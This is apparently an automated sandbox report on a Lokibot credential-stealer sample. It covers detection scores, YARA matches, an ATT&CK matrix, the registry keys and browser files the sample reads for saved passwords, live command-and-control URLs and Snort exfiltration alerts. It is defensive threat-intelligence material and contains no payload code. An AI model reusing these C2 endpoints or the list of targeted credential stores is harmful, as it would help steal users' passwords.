Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe	Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lqoUUYTMsL.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lqoUUYTMsL.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lqoUUYTMsL.exe PID: 6464, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: SmtpPassword		2_2_0040D069

Source: Yara match	File source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	41 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	3 System Information Discovery	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
lqoUUYTMsL.exe	79%	ReversingLabs	ByteCode-MSIL.Hacktool.Boilod
lqoUUYTMsL.exe	100%	Avira	TR/Dropper.MSIL.Gen
lqoUUYTMsL.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tequilacofradiamx.com	91.92.253.228	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php	true		unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown
https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	lqoUUYTMsL.exe, lqoUUYTMsL.exe, 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tequilacofradiamx.com/	lqoUUYTMsL.exe, 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.92.253.228	tequilacofradiamx.com	Bulgaria		34368	THEZONEBG	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428426
Start date and time:	2024-04-18 23:01:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lqoUUYTMsL.exe renamed because original name is a hash value
Original Sample Name:	3113c2a7b30c1cb350e8950b4222b0c4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/3@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 66% Number of executed functions: 213 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: lqoUUYTMsL.exe

Simulations

Behavior and APIs

Time	Type	Description
23:01:57	API Interceptor	1x Sleep call for process: lqoUUYTMsL.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tequilacofradiamx.com	1nFoPjzjGH.exe	Get hash	malicious	Lokibot	Browse	91.92.254.199

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	HW#210872-218YAT-THEON-GLOBAL-Y801823-1AHEY361-APL38102823-19011.exe	Get hash	malicious	GuLoader, PureLog Stealer, zgRAT	Browse	91.92.248.36
	cybXkFC5nF.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	91.92.255.15
	6Qz6WEKB27.elf	Get hash	malicious	Mirai	Browse	91.92.243.252
	RyykKfCeTG.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.92.240.254
	OurfOY2sbZ.elf	Get hash	malicious	Mirai	Browse	91.92.243.252
	1nFoPjzjGH.exe	Get hash	malicious	Lokibot	Browse	91.92.254.199
	2oBR38vDJ1.exe	Get hash	malicious	Remcos	Browse	91.92.244.185
	NDPS70IhR2.exe	Get hash	malicious	Zhark RAT	Browse	91.92.254.233
	2jkBlJCoHT.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.92.251.238
	XCfQ4MVfVP.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.92.251.238

Process:	C:\Users\user\Desktop\lqoUUYTMsL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5:	260E01CC001F9C4643CA7A62F395D747
SHA1:	492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256:	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512:	01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\lqoUUYTMsL.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\lqoUUYTMsL.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.849189397617287
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	lqoUUYTMsL.exe
File size:	369'664 bytes
MD5:	3113c2a7b30c1cb350e8950b4222b0c4
SHA1:	2fe0c50dd095a738788693e147c0b9d883554d2c
SHA256:	7ff1d7dd5684cd38bea4a227bf49d4ceff1de7d2f66a556ccc6ce1a382640fc6
SHA512:	4287e194b702492c3b0c960fc4a0cc1625607789e382b88276eaa9749f3ff32f38cf81da3543601cd1f9e2704366385962f421568702bb72a621cddf77aa58cd
SSDEEP:	6144:MHM3730X5T4avIrevXJZzkhq8R8ahdMSM9C/JWJu0GTY8odnR1j3hfbJHtFy7tcQ:p3cT4Ed3YQG8SM9LJV3dnRLbJHtFy7tJ
TLSH:	C274AEAC726072EFC85BD472DEA82D68EB51747B931B5203A41706ADEE4C897CF150F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-.f..................................... ....@.. ....................... ............@................................

File Icon


Icon Hash:	2341c0e0e0e07133

Static PE Info

General

Entrypoint:	0x45e00a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x661D2DCE [Mon Apr 15 13:38:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0045E000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x50e24	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5c000	0x11ef	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x60000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5e000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x50000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
C)Ez	0x2000	0x4d060	0x4d200	1af5e25483f3eafa98a9c723699e021c	False	1.0003355449756888	data	7.99934222787656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x50000	0xb670	0xb800	d730ef1accab85da58f2651e0c404730	False	0.37814198369565216	data	4.675724005101443	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x5c000	0x11ef	0x1200	ad84c9ab355229a8dfe4bcd6a51bf268	False	0.5034722222222222	data	5.70986614175814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x5e000	0x10	0x200	bc58d7111c20348ad0635eaf9dc32292	False	0.044921875	data	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x60000	0xc	0x200	31373f9c6aeda5023f8c8409dbb92c77	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x5c130	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.8226950354609929
RT_GROUP_ICON	0x5c598	0x14	data	1.1
RT_VERSION	0x5c5ac	0x370	data	0.39545454545454545
RT_MANIFEST	0x5c91c	0x8d3	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.3935369632580788

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/18/24-23:01:56.652272	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49730	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.789410	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49733	80	192.168.2.4	91.92.253.228
04/18/24-23:01:56.652272	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.045440	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.045440	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.045440	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49732	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.045440	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.4	91.92.253.228
04/18/24-23:01:57.372627	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.4	91.92.253.228
04/18/24-23:01:57.372627	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49731	80	192.168.2.4	91.92.253.228
04/18/24-23:01:57.372627	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49731	80	192.168.2.4	91.92.253.228
04/18/24-23:01:57.372627	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49731	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.789410	TCP	2025381	ET TROJAN LokiBot Checkin	49733	80	192.168.2.4	91.92.253.228
04/18/24-23:01:56.652272	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.4	91.92.253.228
04/18/24-23:01:56.652272	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49730	80	192.168.2.4	91.92.253.228
04/18/24-23:01:56.652272	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49730	80	192.168.2.4	91.92.253.228
04/18/24-23:01:57.372627	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.045440	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.789410	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49733	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.789410	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49733	80	192.168.2.4	91.92.253.228
04/18/24-23:01:58.789410	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49733	80	192.168.2.4	91.92.253.228

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 23:01:56.453670025 CEST	49730	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:56.650105953 CEST	80	49730	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:56.650204897 CEST	49730	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:56.652271986 CEST	49730	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:56.848254919 CEST	80	49730	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:56.848431110 CEST	49730	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.044789076 CEST	80	49730	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.045268059 CEST	80	49730	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.045308113 CEST	80	49730	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.045344114 CEST	80	49730	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.045417070 CEST	49730	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.045417070 CEST	49730	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.045653105 CEST	49730	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.175492048 CEST	49731	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.241652966 CEST	80	49730	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.369546890 CEST	80	49731	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.369669914 CEST	49731	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.372627020 CEST	49731	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.566381931 CEST	80	49731	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.566701889 CEST	49731	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.760677099 CEST	80	49731	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.760746956 CEST	80	49731	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.760791063 CEST	80	49731	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.760828972 CEST	80	49731	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:57.760922909 CEST	49731	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.760973930 CEST	49731	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.847592115 CEST	49732	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:57.954878092 CEST	80	49731	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.042484045 CEST	80	49732	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.042579889 CEST	49732	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:58.045439959 CEST	49732	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:58.239928961 CEST	80	49732	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.240035057 CEST	49732	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:58.434726000 CEST	80	49732	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.434952021 CEST	80	49732	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.434993982 CEST	80	49732	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.435033083 CEST	80	49732	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.435066938 CEST	49732	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:58.435154915 CEST	49732	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:58.435156107 CEST	49732	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:58.591398001 CEST	49733	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:58.629482031 CEST	80	49732	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.786005974 CEST	80	49733	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.786103010 CEST	49733	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:58.789410114 CEST	49733	80	192.168.2.4	91.92.253.228
